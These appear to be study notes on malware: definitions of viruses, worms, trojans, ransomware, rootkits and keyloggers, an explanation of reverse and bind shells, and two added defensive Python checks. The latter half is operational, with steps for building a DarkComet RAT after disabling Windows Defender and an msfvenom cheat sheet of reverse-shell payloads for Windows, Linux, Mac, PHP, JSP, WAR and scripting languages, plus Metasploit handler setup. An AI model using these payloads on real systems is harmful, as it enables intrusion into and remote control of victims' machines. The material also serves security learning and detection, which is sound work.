Feb 01, 2020, 04:40 PM
Malware
What is it?
mal + ware = malicious software

Software designed to infiltrate and damage computers without the user's consent.
The term malware encompasses all the different types of threats to your computer, such as:
viruses, spyware, worms, trojans, etc.

Purpose of Malware
Why does malware exist? Why was it created in the first place?
> to do things without the user's permission
> to steal files
> to steal stored passwords
> to hijack a computer
> to hijack core computing functions
> to monitor the activity of the user
> to delete sensitive personal data
> to encrypt sensitive data
> to extort money

Types of Malware:

1. Virus: "vital information resources under siege"
 Disrupts the normal functionality of the computer.

 Viruses are generally hidden in executable files (i.e. attached to .exe files).
 A virus may exist on a system but will not be active or able to spread until a user runs or opens the malicious program.
 Normally, the host program keeps functioning after it is infected by the virus.
 Viruses cannot spread across the network on their own, but they can replicate and attach themselves to other files locally.
 Viruses spread when the software or document they are attached to is transferred from one computer to another using the network,
 a disk, file sharing, or infected email attachments.

2. Worm:
Similar to viruses, but replicates itself across the network as well.
Self-replicating without a host program; spreads without any human interaction or directives from the malware authors.
Worms are standalone software and do not require a host program or human help to propagate.
A worm enters a computer through a vulnerability in the system and takes advantage of
file-transport or information-transport features on the system, allowing it to travel unaided.

Stuxnet: https://www.youtube.com/watch?v=TGGxqjpka-U

3. Trojan
Malicious software that presents itself as legitimate.
> A Trojan is another type of malware, named after the wooden horse that the Greeks used to infiltrate Troy.
> It is a harmful piece of software that looks legitimate. Users are typically tricked into loading and executing it on their systems.
> After it is activated, it can carry out any number of attacks on the host, from irritating the user (popping up windows or changing desktops)
 to damaging the host (deleting files, stealing data, or activating and spreading other malware, such as viruses).
> Trojans are also known to create backdoors to give malicious users access to the system.
> Unlike viruses and worms, Trojans do not reproduce by infecting other files, nor do they self-replicate.
> Trojans must spread through user interaction, such as opening an email attachment or downloading and running a file from the Internet.

4. Spyware
Software that aims to gather information about a person or organization without their knowledge, that may send such information to another entity without the consumer's consent,
 or that asserts control over a device without the consumer's knowledge.

5. Ransomware
A kind of malware that is used to extort money from the infected user.
It encrypts all the files on a user's system using a strong encryption algorithm, then demands a ransom in exchange for the decryption key needed to retrieve the user's data.

6. Rootkit
Programs that hide the existence of malware by intercepting (i.e. "hooking") and modifying operating system API calls that supply system information.
Rootkits, or rootkit-enabling functionality, may reside at the user or kernel level in the operating system, or lower, including a hypervisor, the master boot record, or the system firmware.
 Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.
 Rootkits have been seen for Windows, Linux, and Mac OS X systems.

7. Keyloggers
A special kind of spyware.
The action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored.
The data can then be retrieved by the person operating the logging program. A keylogger can be either software or hardware.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

What are shells?
A shell can simply be described as a piece of code or program used to gain code or command execution on a device (servers, mobile phones, etc.).

Types of shells
1. Reverse shell
2. Bind shell

Reverse shell
A reverse shell is a type of shell in which the target machine connects back to the attacking machine. The attacking machine has a listener port on which it receives the connection, and through that connection code or command execution is achieved.

Figure 1: Reverse TCP shell

Bind shell
A bind shell is a type of shell in which the target (victim) machine opens a communication port, i.e. a listener, and waits for an incoming connection.
The attacker then connects to the victim machine's listener, which leads to code or command execution on the server.

Figure 2: Bind TCP shell
There are a number of popular shell files. To name a few: Reverse TCP Meterpreter, C99 PHP web shell, JSP web shell, Netcat, etc.
 One thing common to all these shells is that they all communicate over TCP.
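The directional difference described above, turned into a host-side check (an added example, not part of the original notes): a bind shell shows up as a listener the victim did not need, a reverse shell as an outbound connection owned by a shell process. The process names, expected ports and connection records are constructed assumptions.

```python
"""Added example (not from the original notes): classify connection-table records
into bind-shell and reverse-shell indicators using the directional difference above."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumed: shells/interpreters that should rarely own a network socket of their own.
SHELL_PROCESSES = {"cmd.exe", "powershell.exe", "sh", "bash", "dash", "zsh"}
# Assumed: TCP ports this hypothetical host is expected to listen on.
EXPECTED_LISTENERS = {22, 80, 443}


@dataclass(frozen=True)
class Conn:
    local: str    # "ip:port"
    remote: str   # "ip:port", or "0.0.0.0:0" for a listener
    state: str    # "LISTEN" or "ESTABLISHED"
    process: str  # owning process name


def _port(addr: str) -> int:
    return int(addr.rsplit(":", 1)[1])


def classify(conn: Conn) -> Optional[str]:
    """Return 'bind-shell', 'reverse-shell' or None for a single TCP record."""
    # Bind shell: the victim itself opens a listener and waits for the attacker.
    if conn.state == "LISTEN" and (
        conn.process in SHELL_PROCESSES or _port(conn.local) not in EXPECTED_LISTENERS
    ):
        return "bind-shell"
    # Reverse shell: a shell process on the victim connects out to the attacker's
    # listener; the remote port is the attacker's LPORT (53 in the notes below).
    if conn.state == "ESTABLISHED" and conn.process in SHELL_PROCESSES:
        return "reverse-shell"
    return None


def find_shells(conns: List[Conn]) -> List[Tuple[str, str, str, str]]:
    """Return (process, local, remote, kind) for every suspicious record."""
    hits = [(c, classify(c)) for c in conns]
    return [(c.process, c.local, c.remote, k) for c, k in hits if k]


# Constructed sample snapshot of a host's TCP connection table.
SAMPLE = [
    Conn("0.0.0.0:443", "0.0.0.0:0", "LISTEN", "nginx"),
    Conn("0.0.0.0:4444", "0.0.0.0:0", "LISTEN", "bash"),
    Conn("10.0.0.5:49152", "203.0.113.9:53", "ESTABLISHED", "cmd.exe"),
    Conn("10.0.0.5:49153", "10.0.0.7:445", "ESTABLISHED", "svchost.exe"),
]
```

On a real host the records would come from netstat/ss output or Sysmon network events; the listener allow-list has to be tuned per machine or ordinary services will be flagged.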
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Creating Malware
RAT: Remote Administration Tool
Dark Comet example

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Disable Windows Defender
Open Dark Comet
Server module (create server) --> full editor
Process mutex --> threads
Network settings --> enter LHOST and LPORT here --> press add
This opens a socket on the attacker machine to listen for the incoming connection
Listen for connection

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Msfvenom

Creating Metasploit Payloads

Often one of the most useful (and, to the beginner, underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module, and it produces something that
 can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler.
 Run 'set payload' for the relevant payload used and configure all necessary options (LHOST, LPORT, etc.).
 Execute and wait for the payload to be run. For the examples below it's pretty self-explanatory, but LHOST should be filled in with your IP address
 (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.

> How to create a malicious file; the file will not be obfuscated or hidden
> Will be using reverse TCP
> A reverse TCP connection is noisy and hence will be detected by Windows Defender
> Staging and encoding techniques are not covered

List payloads
msfvenom -l payloads

msfpayload + msfencode = msfvenom
msf = Metasploit Framework
Kali needed + Windows 10 (Defender disabled)

(the browser may flag the download; antivirus may detect it)
msfvenom -p windows/x64/meterpreter/reverse_tcp --arch x64 --platform windows LHOST=<Your IP Address> LPORT=53 -f exe -o filename

-p payload
-f format: can be exe, apk, py, sh, etc.
-o output file name
LHOST local host / listening host [IP address of Kali]
LPORT local port / listening port
--arch architecture
--platform explicitly specify the victim platform
Before executing the payload, start the handler on Kali:

Handler on Kali
msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set lport <Your Port to Connect On>
set lhost <Your IP Address>

Metasploit: other payloads

OS-specific binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Shellcode
For all shellcode see 'msfvenom --help-formats' for information as to valid parameters. Msfvenom will output code that can be cut and pasted into your exploits in the chosen language.
Linux-based shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows-based shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac-based shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
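As an added example (not from the original notes), a defender-side check tied to the formats listed above: a payload built with -f exe, elf, macho, war or raw PHP keeps that container's leading bytes whatever file name it is given, so comparing the magic bytes with the claimed extension catches the "looks legitimate" file described in the Trojan section. The extension allow-lists and sample files are constructed assumptions.

```python
"""Added example (not from the original notes): recover a file's real container
format from its magic bytes and compare it with the extension it arrived with."""
from typing import Dict, Set, Tuple

# Leading bytes of the formats listed above (-f exe / elf / macho / war / raw php).
MAGIC = {
    b"MZ": "exe",                  # Windows PE
    b"\x7fELF": "elf",             # Linux ELF
    b"\xce\xfa\xed\xfe": "macho",  # 32-bit Mach-O, little-endian
    b"\xcf\xfa\xed\xfe": "macho",  # 64-bit Mach-O, little-endian
    b"PK\x03\x04": "zip",          # zip container: .war, .jar, .apk, Office docs
}

# Assumed: extensions that may legitimately carry each container format.
ALLOWED: Dict[str, Set[str]] = {
    "exe": {"exe", "dll", "scr"},
    "elf": {"elf", "so", "bin", ""},
    "macho": {"macho", "dylib", ""},
    "zip": {"zip", "war", "jar", "apk", "docx", "xlsx"},
    "php": {"php"},
}


def detect_format(data: bytes) -> str:
    """Return the container format implied by the first bytes, or 'unknown'."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    # Raw PHP payloads (and PHP web shells) begin with an opening PHP tag.
    if data.lstrip().startswith(b"<?php"):
        return "php"
    return "unknown"


def check_upload(name: str, data: bytes) -> Tuple[str, str, bool]:
    """Return (detected format, claimed extension, suspicious?) for one file."""
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    kind = detect_format(data)
    suspicious = kind != "unknown" and ext not in ALLOWED[kind]
    return kind, ext, suspicious


# Constructed sample files: only the leading bytes matter to the check.
SAMPLES = {
    "invoice.pdf": b"MZ\x90\x00" + b"\x00" * 60,   # PE disguised as a PDF
    "photo.jpg": b"<?php echo 'hello'; ?>",        # PHP script disguised as an image
    "app.war": b"PK\x03\x04" + b"\x00" * 26,       # genuine war archive
    "notes.txt": b"just some text",
}
```

A real check would also apply a byte limit per file and treat "unknown" formats as worth a second look rather than as clean.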